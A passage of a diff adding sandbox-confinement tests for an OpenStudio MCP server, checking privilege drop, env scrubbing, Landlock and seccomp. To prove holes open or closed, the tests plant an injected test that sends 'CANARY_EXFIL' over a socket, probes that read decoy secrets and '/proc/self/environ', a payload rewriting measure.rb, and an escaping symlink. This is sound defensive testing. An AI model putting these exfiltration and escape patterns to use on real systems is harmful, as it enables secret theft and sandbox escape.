f"VICTIM_SECRET_{tag}" + victim_dir = RUN_ROOT / f"_decoy_victim_{tag}" + victim_dir.mkdir(parents=True, exist_ok=True) + victim_file = victim_dir / "secret.txt" + victim_file.write_text(victim_secret, encoding="utf-8") + escape_file = RUN_ROOT / f"_decoy_escape_{tag}.txt" + listener = _CanaryListener() + listener.start() + + try: + async def _run(): + async with http_session(url) as s: + # --- Arrange --- + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, language) + + # --- Act --- + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": { + "victim_path": str(victim_file), + "escape_path": str(escape_file), + "net_target": f"127.0.0.1:{listener.port}", + }, + })) + assert res.get("ok") is True, f"apply_measure failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + + # --- Assert: each hole is real --- + # 1. Runs as root — no privilege drop. + assert "PROBE uid=0" in info, \ + f"measure should run as root (uid 0) today; info=\n{info}" + # 2. Server's secret env leaks into the measure (os.environ.copy()). + assert f"PROBE env={canary}" in info, \ + f"canary secret should leak into measure env today; info=\n{info}" + # 3. Reads a file outside its run dir (another run's area). + assert f"PROBE read={victim_secret}" in info, \ + f"measure should read the decoy victim file today; info=\n{info}" + # 4. Writes a file outside its run dir — ground truth: file on disk. + assert "PROBE wrote=" in info, f"measure should report a write; info=\n{info}" + assert escape_file.is_file() and escape_file.read_text() == "ESCAPED", \ + "measure should write outside its run dir today (escape file on disk)" + # 5. Opens the network — ground truth: listener received the payload. + assert "PROBE net=sent" in info, f"measure should report net send; info=\n{info}" + listener._thread.join(timeout=5) + assert listener.received == b"CANARY_EXFIL", \ + f"localhost listener should receive exfil today; got {listener.received!r}" + finally: + listener.close() + shutil.rmtree(victim_dir, ignore_errors=True) + escape_file.unlink(missing_ok=True) + + +def test_measure_dir_traversal_blocked(sandbox_server): + # Regression: apply_measure must reject a measure_dir outside all allowed + # roots (own run area / shared read roots), closing the traversal hole where + # any /tmp path holding a measure.rb was copied and executed. The check is + # unconditional (not gated by OSMCP_SANDBOX), so it holds even with sandbox off. + url, _canary = sandbox_server + outside_dir = Path(tempfile.mkdtemp(prefix="osmcp_decoy_measure_")) + decoy_measure = outside_dir / "set_building_name" + shutil.copytree(_FIXTURE_MEASURE, decoy_measure) + + try: + async def _run(): + async with http_session(url) as s: + # --- Arrange --- + await setup_example(s, _unique()) + # --- Act --- + return unwrap(await s.call_tool("apply_measure", { + "measure_dir": str(decoy_measure), + "arguments": {"building_name": "Traversal Test"}, + })) + + res = asyncio.run(_run()) + + # --- Assert: out-of-root measure path is refused before any execution --- + assert res.get("ok") is False, \ + f"apply_measure must reject a measure_dir outside allowed roots; got {res}" + assert "not allowed" in str(res.get("error", "")).lower(), \ + f"error should explain the path is not allowed; got {res.get('error')}" + finally: + shutil.rmtree(outside_dir, ignore_errors=True) + + +@pytest.mark.parametrize("language", ["Ruby", "Python"]) +def test_clean_env_blocks_secret_leak(language, confined_server): + # Validates: OSMCP_SANDBOX=posix strips the server's secret env via the + # allowlist, so an applied measure no longer sees host secrets — AND a normal + # measure run still succeeds, proving the allowlist is complete enough. + url, canary = confined_server + + async def _run(): + async with http_session(url) as s: + # --- Arrange --- + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, language) + # --- Act --- + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": {"victim_path": "", "escape_path": "", "net_target": ""}, + })) + assert res.get("ok") is True, f"apply_measure under posix failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + + # --- Assert: canary secret is gone, the run still produced output --- + assert "PROBE env=" in info, \ + f"clean-env should hide the canary under posix; info=\n{info}" + assert canary not in info, \ + f"canary secret must not appear anywhere under posix; info=\n{info}" + + +@pytest.mark.parametrize("language", ["Ruby", "Python"]) +def test_posix_drops_root_and_applies_rlimits(language, confined_server): + # Validates: OSMCP_SANDBOX=posix runs the measure as the unprivileged sandbox + # uid (1001), applies the NPROC rlimit, and DAC then denies a write to a + # root-owned location outside the run dir (/opt — in-image, not a bind mount, + # so ownership is enforced regardless of host). Read/network are NOT yet closed + # at this tier (Landlock/seccomp follow) — not asserted here. + url, _canary = confined_server + tag = uuid.uuid4().hex[:8] + escape_file = Path(f"/opt/_sbx_escape_{tag}.txt") # root-owned, in-image + + async def _run(): + async with http_session(url) as s: + # --- Arrange --- + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, language) + # --- Act --- + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": { + "victim_path": "", "escape_path": str(escape_file), "net_target": "", + }, + })) + assert res.get("ok") is True, f"apply_measure under posix failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + + # --- Assert: privilege dropped to a per-tenant uid, rlimit applied, DAC blocks + # the escape write. The HTTP fixture is session-keyed, so the measure drops to a + # derived per-tenant uid (M1/M2), not the shared base 1001. --- + m = re.search(r"PROBE uid=(\d+)", info) + assert m, f"probe must report uid; info=\n{info}" + uid = int(m.group(1)) + assert uid != 0, "measure must not run as root under posix" + assert 2000 <= uid < 62000, \ + f"HTTP tenant must drop to a per-tenant sandbox uid (2000..61999), got {uid}; info=\n{info}" + assert "PROBE nproc=1024" in info, f"NPROC rlimit (1024) should be applied; info=\n{info}" + assert "PROBE write_err=" in info, \ + f"write to root-owned /opt should be denied under posix; info=\n{info}" + assert not escape_file.exists(), "DAC must block writing a root-owned out-of-run-dir path" + + +@pytest.mark.parametrize("language", ["Ruby", "Python"]) +def test_full_tier_blocks_read_escape_and_network(language, full_server): + # Validates: OSMCP_SANDBOX=auto (Landlock FS + seccomp net-deny on top of the + # POSIX floor) blocks reading a world-readable file outside the run dir + # (root-owned /opt, not in the read-only allowlist — so DAC alone would NOT + # block it; Landlock does), blocks writing outside the run dir, and blocks + # outbound IP networking — while the measure run itself still succeeds. + url, _canary = full_server + tag = uuid.uuid4().hex[:8] + victim_secret = f"VICTIM_SECRET_{tag}" + victim_file = Path(f"/opt/_sbx_victim_{tag}.txt") # root-owned, in-image, not allowlisted + victim_file.write_text(victim_secret, encoding="utf-8") + escape_file = Path(f"/opt/_sbx_escape_{tag}.txt") + listener = _CanaryListener() + listener.start() + + try: + async def _run(): + async with http_session(url) as s: + # --- Arrange --- + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, language) + # --- Act --- + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": { + "victim_path": str(victim_file), + "escape_path": str(escape_file), + "net_target": f"127.0.0.1:{listener.port}", + }, + })) + assert res.get("ok") is True, f"apply_measure under full tier failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + + # --- Assert: read escape, write escape, and network all denied --- + assert "PROBE read_err=" in info, f"read outside run dir should be denied; info=\n{info}" + assert victim_secret not in info, "victim secret must not leak under the full tier" + assert "PROBE write_err=" in info, f"write outside run dir should be denied; info=\n{info}" + assert not escape_file.exists(), "Landlock must block the out-of-run-dir write" + assert "PROBE net_err=" in info, f"outbound network should be denied; info=\n{info}" + listener._thread.join(timeout=3) + assert listener.received == b"", f"seccomp must block exfil; got {listener.received!r}" + finally: + listener.close() + victim_file.unlink(missing_ok=True) + escape_file.unlink(missing_ok=True) + + +def test_landlock_confines_without_root(): + # Validates: the unprivileged confinement layer (Landlock) applies even when + # the shim runs as a NON-root uid — so a local non-root server still confines + # measure filesystem access; the uid-drop is simply skipped (no hard fail). + # This is what protects a local user, not just the root Docker server. + workdir = tempfile.mkdtemp() + cmd = [ + sys.executable, "-m", "mcp_server._sandbox_exec", + "--uid", "1001", "--gid", "1001", + "--landlock-ro", "/usr", "--landlock-ro", "/lib", "--landlock-ro", "/lib64", + "--landlock-rw", workdir, + "--", "cat", "/etc/hostname", # /etc not granted -> must be denied + ] + try: + # Run the shim AS uid 1001 (non-root) to exercise the no-root path. + proc = subprocess.run( # noqa: S603 - fixed argv, no shell + cmd, capture_output=True, text=True, cwd="/repo", + user=1001, group=1001, check=False, + ) + out = (proc.stdout + proc.stderr).lower() + assert proc.returncode != 0, \ + f"Landlock must block /etc read even without root; rc=0 out={out}" + assert "denied" in out, f"expected a permission-denied error; out={out}" + finally: + shutil.rmtree(workdir, ignore_errors=True) + + +def test_local_host_files_protected(sandbox_server, full_server): + # Validates THE LOCAL ISSUE (dual-run, vuln -> fixed): the server bind-mounts + # the user's real host directories (here /repo). Unconfined, a measure an LLM + # authored writes straight into the user's checked-out repo on their machine; + # the sandbox blocks it. Benign — one canary file at the repo root, asserted + # PRESENT under off (the vulnerability) and ABSENT under auto (the fix), + # cleaned up either way. /repo is read-only in the sandbox allowlist, so the + # write is denied without breaking measures that legitimately read the repo. + tag = uuid.uuid4().hex[:8] + host_file = Path(f"/repo/_sandbox_local_canary_{tag}.txt") # /repo = bind-mounted host source + + async def _attempt_write(url): + async with http_session(url) as s: + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, "Ruby") + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": {"victim_path": "", "escape_path": str(host_file), "net_target": ""}, + })) + assert res.get("ok") is True, f"apply_measure failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + try: + # --- Vulnerability: unconfined (off) writes into the user's host repo --- + off_info = asyncio.run(_attempt_write(sandbox_server[0])) + assert "PROBE wrote=" in off_info, f"off: expected a successful write; {off_info}" + assert host_file.is_file(), \ + "VULN: an unconfined measure wrote into the user's bind-mounted host dir (/repo)" + host_file.unlink(missing_ok=True) + + # --- Fixed: confined (auto) denies the write --- + auto_info = asyncio.run(_attempt_write(full_server[0])) + assert "PROBE write_err=" in auto_info, f"auto: expected the write to be denied; {auto_info}" + assert not host_file.is_file(), \ + "FIXED: the sandbox (Landlock, /repo read-only) blocks writing to the user's host dir" + finally: + host_file.unlink(missing_ok=True) + + +def test_sandbox_net_allow_permits_network(net_allow_server): + # Validates: OSMCP_SANDBOX_NET=allow leaves outbound networking open under the + # full tier (the knob is actually wired into wrap_cmd; default deny is tested + # by test_full_tier_blocks_read_escape_and_network). + listener = _CanaryListener() + listener.start() + try: + async def _run(): + async with http_session(net_allow_server) as s: + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, "Ruby") + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": { + "victim_path": "", "escape_path": "", + "net_target": f"127.0.0.1:{listener.port}", + }, + })) + assert res.get("ok") is True, f"apply_measure failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + assert "PROBE net=sent" in info, f"net should be allowed; info=\n{info}" + listener._thread.join(timeout=5) + assert listener.received == b"CANARY_EXFIL", \ + f"OSMCP_SANDBOX_NET=allow should permit the connection; got {listener.received!r}" + finally: + listener.close() + + +def _trivial_body(language: str) -> str: + indent = " " if language == "Ruby" else " " + return f'{indent}runner.registerInfo("measure ok")' + + +async def _create_trivial_measure(session, language: str) -> str: + res = unwrap(await session.call_tool("create_measure", { + "name": _unique("tm_" + ("rb" if language == "Ruby" else "py")), + "description": "Trivial measure for test_measure confinement check.", + "run_body": _trivial_body(language), + "language": language, + "arguments": [], + })) + assert res.get("ok") is True, f"create_measure failed: {res}" + return res["measure_dir"] + + +_EVIL_TEST = ( + "import socket\n" + "def test_zzz_exfil():\n" + " try:\n" + " s = socket.create_connection(('127.0.0.1', {port}), timeout=5)\n" + " s.sendall(b'CANARY_EXFIL')\n" + " s.close()\n" + " except Exception:\n" + " pass\n" +) + + +def test_measure_test_code_confined(sandbox_server, full_server): + # Validates THE COPILOT FINDING fix (dual-run): test_measure now runs untrusted + # test code under the sandbox. Inject a test that exfils to a localhost + # listener; under off it connects (vuln — test code was unconfined), under auto + # seccomp blocks it (fixed). Asserts on the listener (ground truth). The off + # leg is the falsifiability control: it proves the evil test actually runs. + async def _run_test_measure(url, port): + async with http_session(url) as s: + measure_dir = await _create_trivial_measure(s, "Python") + evil = Path(measure_dir) / "tests" / "test_zzz_evil.py" + evil.write_text(_EVIL_TEST.format(port=port), encoding="utf-8") + await s.call_tool("test_measure", {"measure_dir": measure_dir}) + + # --- Vulnerability: off lets the (untrusted) test code reach the network --- + off_listener = _CanaryListener() + off_listener.start() + try: + asyncio.run(_run_test_measure(sandbox_server[0], off_listener.port)) + off_listener._thread.join(timeout=5) + assert off_listener.received == b"CANARY_EXFIL", \ + "VULN: test_measure ran test code that reached the network under off" + finally: + off_listener.close() + + # --- Fixed: auto confines test_measure (seccomp blocks the exfil) --- + auto_listener = _CanaryListener() + auto_listener.start() + try: + asyncio.run(_run_test_measure(full_server[0], auto_listener.port)) + auto_listener._thread.join(timeout=5) + assert auto_listener.received == b"", \ + f"FIXED: test_measure code must be net-confined under auto; got {auto_listener.received!r}" + finally: + auto_listener.close() + + +def test_measure_xml_refresh_does_not_execute_rewritten_measure_unconfined(full_server): + # Regression: sandboxed test code could rewrite measure.rb, then test_measure + # ran `openstudio measure -u` unsandboxed as root and evaluated the rewritten + # file. A disposable /repo canary proves no post-test evaluation escapes. + url, _ = full_server + canary = Path(f"/repo/_sandbox_xml_refresh_{uuid.uuid4().hex[:10]}.txt") + + async def _run(): + async with http_session(url) as s: + await setup_example(s, _unique()) + created = unwrap(await s.call_tool("create_measure", { + "name": _unique("xml_refresh_probe"), + "description": "Benign post-test XML refresh confinement probe.", + "run_body": " runner.registerInfo('normal measure body')", + "language": "Ruby", + "arguments": [], + })) + assert created["ok"] is True, f"create_measure failed: {created}" + + measure_dir = Path(created["measure_dir"]) + test_files = sorted((measure_dir / "tests").glob("*_test.rb")) + assert len(test_files) == 1, ( + f"generated Ruby measure should have exactly one test file, got {test_files}" + ) + test_files[0].write_text( + textwrap.dedent( + f""" + require 'openstudio' + require 'minitest/autorun' + require_relative '../measure' + + class XmlRefreshRewriteTest < Minitest::Test + def test_rewrite_measure_after_load + measure_path = File.expand_path('../measure.rb', __dir__) + original = File.read(measure_path) + payload = "File.write('{canary}', 'UNSANDBOXED_XML_REFRESH')\\n" + File.write(measure_path, payload + original) + assert_equal(false, File.exist?('{canary}')) + end + end + """, + ).lstrip(), + encoding="utf-8", + ) + + return unwrap(await s.call_tool("test_measure", { + "measure_dir": str(measure_dir), + })) + + try: + result = asyncio.run(_run()) + assert result["ok"] is True, f"sandboxed measure test should pass: {result}" + assert not canary.exists(), ( + "post-test `openstudio measure -u` evaluated rewritten measure.rb " + "outside the sandbox and created the host-mounted canary" + ) + finally: + canary.unlink(missing_ok=True) + + +# --------------------------------------------------------------------------- +# Codex review reproductions (confirm-now): each PASSES today by demonstrating +# the open hole, run under the FULL tier (OSMCP_SANDBOX=auto) so it proves the +# sandbox does NOT yet stop it. Tagged with the Codex finding id + how to INVERT +# the assertion once the fix lands. All use canaries/decoys only. +# Not yet reproduced here (need heavier setup): C1 reporting-measure test path +# (needs a completed sim/SQL), C2 `openstudio measure -u` Ruby injection, +# H1 seccomp arch fail-open (needs an i386/x32 binary), H2 fail-open on a kernel +# without Landlock. +# --------------------------------------------------------------------------- + +def test_c3_escaping_symlink_rejected(full_server): + # Codex C3 (FIXED): a measure dir containing a symlink that escapes the measure + # root is rejected before any copy — no host-file content is inlined into the + # readable run dir. + url, _ = full_server + tag = uuid.uuid4().hex[:8] + secret_file = Path(f"/opt/_sbx_c3_{tag}.txt") # outside the measure dir + secret_file.write_text(f"C3_SECRET_{tag}", encoding="utf-8") + try: + async def _run(): + async with http_session(url) as s: + await setup_example(s, _unique()) + mdir = Path(await _create_trivial_measure(s, "Ruby")) + (mdir / "evil_link.txt").symlink_to(secret_file) # escaping symlink + return unwrap(await s.call_tool("apply_measure", {"measure_dir": str(mdir)})) + + res = asyncio.run(_run()) + assert res.get("ok") is False and "symlink" in str(res.get("error", "")).lower(), \ + f"C3: an escaping symlink in the measure dir must be rejected; got {res}" + finally: + secret_file.unlink(missing_ok=True) + + +def test_c4_run_simulation_rejects_out_of_root_osm(full_server): + # Codex C4 (FIXED): run_simulation rejects an OSM outside all allowed roots + # (no staging arbitrary host files into the run dir). + url, _ = full_server + tag = uuid.uuid4().hex[:8] + outside_osm = Path(f"/opt/_sbx_c4_{tag}.osm") # outside every allowed root + try: + async def _run(): + async with http_session(url) as s: + cr = unwrap(await s.call_tool("create_example_osm", {"name": _unique()})) + assert cr["ok"] is True, cr + shutil.copy2(cr["osm_path"], outside_osm) # a valid OSM at a host path + res = unwrap(await s.call_tool("run_simulation", { + "osm_path": str(outside_osm), "epw_path": EPW_PATH})) + if res.get("ok") and res.get("run_id"): + await s.call_tool("cancel_run", {"run_id": res["run_id"]}) + return res + + res = asyncio.run(_run()) + assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \ + f"C4: out-of-root OSM must be rejected; got {res}" + finally: + outside_osm.unlink(missing_ok=True) + + +def test_c5_test_measure_rejects_out_of_root_dir(full_server): + # Codex C5 (FIXED): test_measure rejects a measure_dir outside all allowed + # roots (before it would chown / Landlock-grant an arbitrary path). + url, _ = full_server + outside = Path(tempfile.mkdtemp(prefix="osmcp_c5_")) + decoy = outside / "set_building_name" + shutil.copytree(_FIXTURE_MEASURE, decoy) + try: + async def _run(): + async with http_session(url) as s: + await setup_example(s, _unique()) + return unwrap(await s.call_tool("test_measure", {"measure_dir": str(decoy)})) + + res = asyncio.run(_run()) + assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \ + f"C5: out-of-root measure_dir must be rejected; got {res}" + finally: + shutil.rmtree(outside, ignore_errors=True) + + +@pytest.fixture(scope="module") +def uid0_server(): + """Full tier but with a misconfigured sandbox uid of 0 (OSMCP_SANDBOX_UID=0).""" + if not integration_enabled(): + pytest.skip("integration disabled") + with http_server({ + "MCP_AUTH": "none", "OSMCP_SANDBOX": "auto", + "OSMCP_SANDBOX_UID": "0", "OSMCP_SANDBOX_GID": "0", + }) as (url, _proc): + yield url + + +def test_h5_sandbox_uid_zero_clamped(uid0_server): + # Codex H5 (FIXED): OSMCP_SANDBOX_UID=0 is rejected/clamped to the safe default, + # so confined code never runs as root even with the bad override. + async def _run(): + async with http_session(uid0_server) as s: + await setup_example(s, _unique()) + measure_dir = await _create_probe_measure(s, "Ruby") + res = unwrap(await s.call_tool("apply_measure", { + "measure_dir": measure_dir, + "arguments": {"victim_path": "", "escape_path": "", "net_target": ""}, + })) + assert res.get("ok") is True, f"apply_measure failed: {res}" + return "\n".join(res.get("runner_messages", {}).get("info", [])) + + info = asyncio.run(_run()) + # OSMCP_SANDBOX_UID=0 must never yield a root-running measure. The base-uid + # clamp is unit-tested (test_sandbox_uid_zero_clamped); this HTTP fixture is + # session-keyed, so the measure drops to a per-tenant derived uid (also never + # root) regardless of the bad base override. + m = re.search(r"PROBE uid=(\d+)", info) + assert m, f"H5: probe must report uid; info=\n{info}" + uid = int(m.group(1)) + assert uid != 0, f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}" + assert 2000 <= uid < 62000, \ + f"H5: confined code must run as a non-root per-tenant uid, got {uid}; info=\n{info}" + + +def test_unknown_sandbox_mode_fails_closed(): + # Regression: a typo'd OSMCP_SANDBOX (e.g. 'atuo') left enabled()=True but + # _full()=False, silently downgrading the default Landlock+seccomp tier to + # posix-only. An unknown value must normalize to 'auto' (fail-closed). + from mcp_server import config + assert config._normalize_sandbox_mode("atuo") == "auto" + assert config._normalize_sandbox_mode("landlok") == "auto" + assert config._normalize_sandbox_mode("AUTO") == "auto" + assert config._normalize_sandbox_mode(" posix ") == "posix" + assert config._normalize_sandbox_mode("off") == "off" + assert config._normalize_sandbox_mode("") == "" # explicit off-alias, honored + + +def test_safe_float_rejects_non_finite(): + # Regression: a NaN/inf SIM_TIMEOUT made both `<= 0` and the elapsed-time + # comparison false, silently disabling wall-clock timeout enforcement. + from mcp_server import config + assert config._safe_float("nan", 7200.0) == 7200.0 + assert config._safe_float("inf", 7200.0) == 7200.0 + assert config._safe_float("-inf", 7200.0) == 7200.0 + assert config._safe_float("bad", 7200.0) == 7200.0 + assert config._safe_float("3.5", 7200.0) == pytest.approx(3.5) + + +def test_build_env_drops_lc_prefixed_secret(monkeypatch, tmp_path): + # Regression: a bare 'LC_' allowlist prefix copied any LC_*-named host var + # (e.g. LC_API_TOKEN) into untrusted measure code. Only standard locale + # categories may pass; arbitrary names — even LC_-prefixed — are dropped. + from mcp_server import sandbox + monkeypatch.setattr(sandbox, "SANDBOX_MODE", "posix") # force enabled() + filtering + monkeypatch.setenv("LC_CTYPE", "en_US.UTF-8") + monkeypatch.setenv("LC_API_TOKEN", "supersecret") + monkeypatch.setenv("MY_SECRET", "nope") + monkeypatch.setenv("PATH", "/usr/bin") + env = sandbox.build_env(tmp_path, redirect_tmp=False) + assert env.get("LC_CTYPE") == "en_US.UTF-8", "standard locale var must pass" + assert "LC_API_TOKEN" not in env, "LC_-prefixed secret must be dropped" + assert "MY_SECRET" not in env, "non-allowlisted secret must be dropped" + assert env.get("PATH") == "/usr/bin", "PATH is required and allowlisted" + + +def test_wrap_cmd_grants_device_files_not_whole_dev(monkeypatch, tmp_path): + # Regression: granting /dev rw also exposed writable /dev/shm + /dev/mqueue + # (shared storage/IPC outside the run dir) and permitted mknod. Confine to the + # specific device FILES instead (file-level Landlock rules). + from mcp_server import sandbox + monkeypatch.setattr(sandbox, "SANDBOX_MODE", "auto") # full tier + monkeypatch.setattr(sandbox, "SANDBOX_NET", "deny") + monkeypatch.setattr(sandbox, "_has_backend", lambda: True) + wrapped = sandbox.wrap_cmd(["echo", "hi"], tmp_path) + rw = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-rw"] + ro = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-ro"] + assert "/dev" not in rw, f"must not grant the whole /dev dir rw: {rw}" + assert "/dev/null" in rw and "/dev/zero" in rw, f"missing rw device files: {rw}" + assert "/dev/urandom" in ro and "/dev/random" in ro, f"missing ro device files: {ro}" + assert "/dev/shm" not in rw and "/dev/shm" not in ro, "/dev/shm must never be granted" # noqa: S108 + + +def test_test_measure_does_not_mutate_shared_source(tmp_path, monkeypatch): + # Regression (Codex #3): test_measure executed in the caller's measure dir, + # writing test_model.osm + chowning + Landlock-granting it. For a measure under a + # SHARED read-only root (e.g. a bundled measure) that mutates shared/host content. + # The fix copies a non-writable-root measure into a private run dir and tests the + # copy, leaving the source untouched. (Monkeypatches config ROOTS — environment + # setup, like RUN_ROOT — not the unit under test.) + from mcp_server import config + from mcp_server.skills.measure_authoring import operations as mops + + shared_root = tmp_path / "shared" + measure = shared_root / "mymeasure" + (measure / "tests").mkdir(parents=True) + (measure / "measure.rb").write_text("# fake ModelMeasure\nclass M\nend\n") + (measure / "tests" / "mymeasure_test.rb").write_text("require 'openstudio'\n") + model = shared_root / "seed.osm" + model.write_text("OS:Version,;\n") # a readable file to copy as the test model + + # Treat shared_root as a shared READ-ONLY root; private writable area elsewhere. + monkeypatch.setattr(config, "_SHARED_READ_ROOTS", + [*config._SHARED_READ_ROOTS, shared_root.resolve()]) + run_root = tmp_path / "runs" + run_root.mkdir() + monkeypatch.setattr(mops, "user_run_root", lambda: run_root) + + mops.test_measure_op(str(measure), model_path=str(model)) + + assert not (measure / "tests" / "test_model.osm").exists(), \ + "test_model.osm was written into the SHARED measure source — must use a private copy" + assert sorted(p.name for p in (measure / "tests").iterdir()) == ["mymeasure_test.rb"], \ + "shared measure source/tests was mutated" + + +def test_proc_not_in_landlock_ro_allowlist(): + # Regression (H1): /proc was a Landlock RO root, so a confined measure could + # read /proc//environ. On a non-root server (measure uid == server uid) + # that recovers the server secrets clean-env stripped — incl. HTTP auth + # tokens. /proc must NOT be granted; Landlock then denies it for everyone. + from mcp_server import sandbox + ro = sandbox._ro_paths() + assert "/proc" not in ro, f"/proc must not be a Landlock RO root (H1): {ro}" + + +def test_full_tier_denies_proc_environ_read(): + # Regression (H1, dual-proof): with /proc granted, a confined process could + # read /proc/self/environ (DAC always allows self) — the same surface that + # leaks /proc//environ on a non-root server. Built via the REAL + # wrap_cmd so it tracks the actual allowlist; the read must now be DENIED. + from mcp_server import sandbox + if sandbox.active_tier() != "landlock": + pytest.skip("needs full tier (OSMCP_SANDBOX=auto)") + workdir = tempfile.mkdtemp() + cmd = sandbox.wrap_cmd(["cat", "/proc/self/environ"], workdir) + try: + proc = subprocess.run( # noqa: S603 - fixed argv, no shell + cmd, capture_output=True, text=True, cwd="/repo", + user=1001, group=1001, check=False, + ) + out = (proc.stdout + proc.stderr).lower() + assert proc.returncode != 0, f"/proc read must be denied (H1); rc=0 out={out[:200]}" + assert ("denied" in out or "no such" in out + or "operation not permitted" in out), f"expected denial; out={out[:300]}" + finally: + shutil.rmtree(workdir, ignore_errors=True) + + +def test_per_tenant_uid_gives_dac_isolation(): + # Regression (M2): every tenant shared uid 1001, so in the posix tier (no + # Landlock) tenant B could read tenant A's run files by plain DAC. Per-tenant + # uids restore DAC isolation — a 0600 file owned by tenant A's uid is + # unreadable by tenant B's uid, with no Landlock involved. + from mcp_server import config + uid_a = config._derive_tenant_uid("tenantA") + uid_b = config._derive_tenant_uid("tenantB") + assert uid_a != uid_b, "distinct tenants must derive distinct uids" + d = Path(tempfile.mkdtemp()) + try: + secret = d / "modelA.osm" + secret.write_text("TENANT_A_PRIVATE") + os.chown(secret, uid_a, uid_a) + secret.chmod(0o600) + # dir must be traversable so the denial proven is the file's, not the dir's + d.chmod(0o755) + # absolute path (no PATH lookup), fixed argv, no shell + proc = subprocess.run( # noqa: S603 + ["/bin/cat", str(secret)], + capture_output=True, text=True, + user=uid_b, group=uid_b, check=False, + ) + out = (proc.stdout + proc.stderr).lower() + assert proc.returncode != 0, f"tenant B must not read tenant A's 0600 file; rc=0 out={out}" + assert "permission denied" in out, f"expected DAC denial; out={out}" + finally: + shutil.rmtree(d, ignore_errors=True) + + +def test_input_root_not_in_landlock_ro_allowlist(): + # Regression (Codex #5): /inputs (INPUT_ROOT) is a SHARED multi-tenant dir; + # granting it read in the Landlock policy let one tenant's confined measure read + # another tenant's inputs. Inputs are staged into the run dir, so /inputs must + # NOT be a read-only root. + from mcp_server import sandbox + from mcp_server.config import COMMON_MEASURES_DIR, COMSTOCK_MEASURES_DIR, INPUT_ROOT + ro = sandbox._ro_paths() + assert str(INPUT_ROOT) not in ro, f"INPUT_ROOT must not be a Landlock RO root: {ro}" + # The legitimately-needed shared measure roots are still granted. + assert str(COMSTOCK_MEASURES_DIR) in ro and str(COMMON_MEASURES_DIR) in ro, \ + f"bundled-measure roots must stay readable: {ro}" diff --git a/tests/test_sim_queue.py b/tests/test_sim_queue.py index 03ed284..7cc93e2 100644 --- a/tests/test_sim_queue.py +++ b/tests/test_sim_queue.py @@ -86,6 +86,40 @@ async def _run(): asyncio.run(_run()) +@pytest.mark.integration +def test_sim_timeout_kills_long_run(): + # Validates: OSMCP_SIM_TIMEOUT_SECONDS caps wall-clock — a sim that exceeds it + # is terminated and marked failed with a timeout error (runaway/DoS guard). A + # 2s cap fires long before the example-model sim could ever finish. + if not integration_enabled(): + pytest.skip("Set RUN_OPENSTUDIO_INTEGRATION=1 to enable integration tests.") + + with http_server({"MCP_AUTH": "none", "OSMCP_SIM_TIMEOUT_SECONDS": "2"}) as (url, _proc): + async def _run(): + async with http_session(url) as s: + cr = unwrap(await s.call_tool( + "create_example_osm", {"name": f"to_{uuid.uuid4().hex[:8]}"})) + assert cr["ok"] is True, cr + rs = unwrap(await s.call_tool( + "run_simulation", {"osm_path": cr["osm_path"], "epw_path": EPW_PATH})) + assert rs["ok"] is True, rs + run_id = rs["run_id"] + + status, err = rs["status"], "" + for _ in range(120): # up to 60s; the 2s cap fires far sooner + run = unwrap(await s.call_tool("get_run_status", {"run_id": run_id}))["run"] + status, err = run["status"], (run.get("error") or "") + if status in ("success", "failed", "cancelled", "error"): + break + await asyncio.sleep(0.5) + + assert status == "failed", f"timed-out sim must be 'failed', got {status!r}" + assert "cap" in err.lower() or "exceeded" in err.lower(), \ + f"error should indicate the wall-clock timeout; got {err!r}" + + asyncio.run(_run()) + + @pytest.mark.integration def test_cancelled_running_sim_stays_cancelled(): # Regression: _refresh_status reclassified a cancelled (running) run as "failed" @@ -127,3 +161,61 @@ async def _run(): await asyncio.sleep(0.3) asyncio.run(_run()) + + +@pytest.mark.integration +def test_enforce_timeouts_skips_dead_pid(monkeypatch): + # Regression: _enforce_timeouts marked a finished-but-unreaped run as 'failed' + # without checking _pid_alive, clobbering a possibly-successful result. A run + # whose process already exited must be left for the reaper to classify by exit + # code, not force-failed by the timeout enforcer. + import time + + from mcp_server.skills.simulation import operations as ops + + monkeypatch.setattr(ops, "SIM_TIMEOUT_SECONDS", 1.0) + started = time.time() - 10_000 # well past the 1s cap + rec = ops.RunRecord( + run_id="t_dead_pid", user_key="u", name="n", status="running", + created_at=started, started_at=started, ended_at=None, + pid=2_000_000_000, # bogus pid -> _pid_alive() is False (no such process) + run_dir=Path("/runs/none"), osw_path=Path("/runs/none/in.osw"), + epw_path=None, exit_code=None, error=None, + ) + monkeypatch.setitem(ops._RUNS, rec.run_id, rec) + ops._enforce_timeouts() + assert ops._RUNS[rec.run_id].status == "running", \ + "dead-but-unreaped run was force-failed instead of left for the reaper" + + +@pytest.mark.integration +def test_kill_process_group_terminates_session_leader(): + # Regression: timeout/cancel killed only the leader pid, orphaning forked + # children (EnergyPlus). Runs now launch in their own session (start_new_session) + # and _kill_process_group signals the whole group; the kernel delivers killpg to + # every group member, so verifying the new-session leader dies via the group path + # is sufficient (and never touches the server's own group). + import contextlib as _ctx + import os + import subprocess + import time + + import psutil + + 